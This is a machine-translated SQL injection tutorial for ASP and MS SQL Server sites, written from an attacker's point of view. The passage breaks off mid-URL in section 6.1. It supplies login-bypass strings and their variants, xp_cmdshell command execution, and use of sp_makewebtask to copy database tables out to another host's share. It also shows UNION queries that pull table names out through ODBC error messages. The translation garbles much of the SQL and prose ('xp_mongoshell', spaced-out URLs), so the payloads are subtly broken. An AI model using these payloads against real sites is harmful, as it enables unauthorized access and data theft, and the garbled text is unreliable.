SQL Injection skills

Author: demonalex Source: demonalex.nease.net

[Translation] SQL Injection skills

Original: sk@scan-associates.net
Source: http://www.securiteam.com/
Translated by: demonalex
Email: demonalex_at_dark2s.org


Abstract:

This article is intended to help those who want to know how to use this vulnerability and how to protect themselves from this vulnerability attack to understand the nature of this vulnerability.


Details:

1.0 Introduction

When a machine only opens port 80 (HTTP service is provided here), most of your vulnerability scanners may not provide you with a lot of valuable information (vulnerability information ), if the administrator of this machine often patches his server, we have to direct the attack to WEB service attacks. SQL injection attacks are one type of WEB attacks. These attacks have no special requirements. They only need the other party to provide normal HTTP Services and ignore the Administrator's "PATCH crazy" status ". This type of attacks mainly target some WEB processing programs (such as ASP, JSP, PHP, CGI, and so on.

This article is not about new things for you. It has been widely used before SQL injection attacks. I am writing this article only now because I want to record some of my experience and accumulation in my recent experiments. I hope I can give readers some reference. You can also go to "9.0 where can I get more relevant information ?" Find more information about SQL injection techniques written by others.

1.1 What is SQL injection?

The trick of this attack is to embed the SQL query/behavior command into a valid HTTP request by embedding it to achieve the attacker's intention. Currently, many dynamic web pages obtain some parameters from users' requests, and then dynamically construct SQL requests to be sent to the database. For example, when a user needs to log on (user identity verification) through a user on the web page, the dynamic web page adds the user name and password submitted by the user to the SQL query request and sends it to the database to confirm whether the identity verification information submitted by the user is valid. From the perspective of SQL injection attacks, this can enable us to attack by modifying the user name and/or password value in the 'domain 'area when sending SQL requests.

What are the requirements for 1.2SQL injection (tools, etc?

A Web browser.


2.0 What information are you looking?

First, you need to find the pages that allow data submission, such as login pages, search pages, feedback pages, and so on. Sometimes, some HTML pages pass the required parameters to other ASP pages through the POST command. Therefore, sometimes you will not see the relevant parameters in the URL path. However, you can check the "FORM" tag in the HTML source code to identify whether a parameter is passed. The related code is as follows:

<FORM action = Search/search. asp method = post>
<Input type = hidden name = A value = C>
</FORM>

Each parameter transfer between the <FORM> and </FORM> tag pairs may be exploited (in the case of attacks) for SQL injection.

2.1 What should you do if you cannot find a page with input behaviors?

You can find some pages related to ASP, JSP, CGI, or PHP. Try to find some special URLs with some parameters, such:
Http: // duck/index. asp? Id = 10


3.0 how should you test whether these defects exist?

First, add some special character tags, such:

Hi or 1 = 1 --

Search for some login pages, enter the following in the login ID and password field, or in the URL:

-Login: hi or 1 = 1 --
-Pass: hi or 1 = 1 --
-Http: // duck/index. asp? Id = hi or 1 = 1 --

If you want to perform such a test in the form of 'hiding ', you can download the HTML webpage from the website to the local hard disk and modify the values of the hidden part, for example:

<FORM action = http: // duck/Search/search. asp method = post>
<Input type = hidden name = A value = "hi or 1 = 1 --">
</FORM>

If you are lucky, it is estimated that you can log on successfully without the account and password.

3.1 why is it or 1 = 1?

Let's take a look at the importance of using or 1 = 1 in other examples. Different from the normal login method, this method may be used to obtain some special information that cannot be obtained during normal login. Use the ASP page obtained from a link for example:

Http: // duck/index. asp? Category = food

In the above URL, category is a variable name, and food is the value assigned to the variable. In order to do this (the link is successful), this ASP must contain the following relevant code (below is also the code we wrote to demonstrate this experiment ):

V_cat = request ("category ")
Sqlstr = "SELECT * FROM product WHERE PCategory =" & v_cat &""
Set rsw.conn.exe cute (sqlstr)

As we can see, the variable value will be pre-processed and assigned to v_cat, that is, the SQL statement will change:

SELECT * FROM product WHERE PCategory = food

This request will return the result obtained after comparing with the WHERE condition. In this example, it is also the food. Now imagine if we change the URL to this:

Http: // duck/index. asp? Category = food or 1 = 1 --

Now the value of our variable v_cat is equivalent to "food or 1 = 1 --". If we want to re-import the SQL request, the SQL request will be:

SELECT * FROM product WHERE PCategory = food or 1 = 1 --

Now, this request selects each piece of information from the product table and does not check whether PCategory is equal to food. The two -- (broken number) at the end is used to tell ms SQL SERVER to ignore the ending one (single quotation marks ). Sometimes you can use # (well number) to replace -- (double break number) Here usage.

In any case, if the recipient is not an SQL server (ms SQL SERVER here), or you cannot ignore the last single quotation mark in a simple way, you can try:

Or a =

In this case, the entire SQL request will be changed:

SELECT * FROM product WHERE PCategory = food or a =

It also returns the same result.

According to the actual situation, SQL Injection requests may change dynamically in a variety of ways:

Or 1 = 1 --
"Or 1 = 1 --
Or 1 = 1 --
Or a =
"Or" a "="
) Or (a =


4.0 how to add instant execution commands to SQL Injection requests?

The servers that can perform SQL injection are generally machines that do not perform systematic configuration checks. At this time, we can try to execute requests using SQL commands. The default ms SQL Server runs at the SYSTEM user level, which is equivalent to the execution and access permissions of the SYSTEM administrator. We can use the extended storage process of ms SQL SERVER (such as master .. xp_mongoshell) to execute some commands of the remote system:

; Exec master .. xp_cmdshell ping 10.10.1.2 --

If it fails, try to use "(double quotation marks) instead (single quotation marks ).

The second colon in the preceding example indicates the end of an SQL request (it also indicates that it is followed by a new SQL command ). To check whether the PING command above is successful, you can listen to the ICMP request packet on 10.10.1.2 and check whether it comes from the SQL server:

# Tcpdump icmp

If you cannot get the PING request from the SQL Server and get the error message in the return value of the SQL request, it may be because the administrator of the SQL Server restricts WEB users to access these stored procedures.


5.0 How can I obtain the returned information of My SQL request?

We can use sp_makewebtask to write related requests to the URL during processing:

; EXEC master .. sp_makewebtask "\ 10.10.1.3104output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

The prerequisite is that the "share" attribute of the target host must be set to "Everyone ".


6.0 how can I get some important data from the ODBC error message returned by the database?

By sending specially crafted SQL requests, ms SQL SERVER can expose the desired information (such as the table name and column name) from the returned information ). For example, there is a URL:

Http: // duck/index. asp? Id = 10

In the above URL, we can try to add other request strings after the integer 10 by using the UNION clause, for example:

Http: // duck/index. asp? Id = 10 union select top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES --

In the above example, the system table INFORMATION_SCHEMA.TABLES contains information about all the tables on this server. The TABLE_NAME area includes the name of each table. We chose to write this because we know it exists. In other words, our SQL query request is:

Select top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

After receiving the request data, the server will return the first table name of the database. When we add the request string to an integer 10 using the UNION clause, the ms SQL SERVER attempts to convert the string to an integer. Since we cannot convert a string (nvarchar) to an integer (int), the system will produce an error. The following error message is displayed on the server:

Microsoft ole db Provider for ODBC Drivers error 80040e07
[Microsoft] [odbc SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value
Table1 to a column of data type int.
/Index. asp, line 5

This error message tells us all the information about the conversion error (including the table name we want to know ). In this instance, we know that the first table name is "table1 ". To get the next table name, we can send this request:

Http: // duck/index. asp? Id = 10 union select top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WH
ERE TABLE_NAME not in (table1 )--

We can also use LIKE to find related special words:

Http: // duck/index. asp? Id = 10 union select top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE % 25 login % 25 --

Output:

Microsoft ole db Provider for ODBC Drivers error 80040e07
[Microsoft] [odbc SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value
Admin_login to a column of data type int.
/Index. asp, line 5

6.1 how to find the column name in the table?

We can use another important table INFORMATION_SCHEMA.COLUMNS to list all the column names of a table:

Http: // duck/inde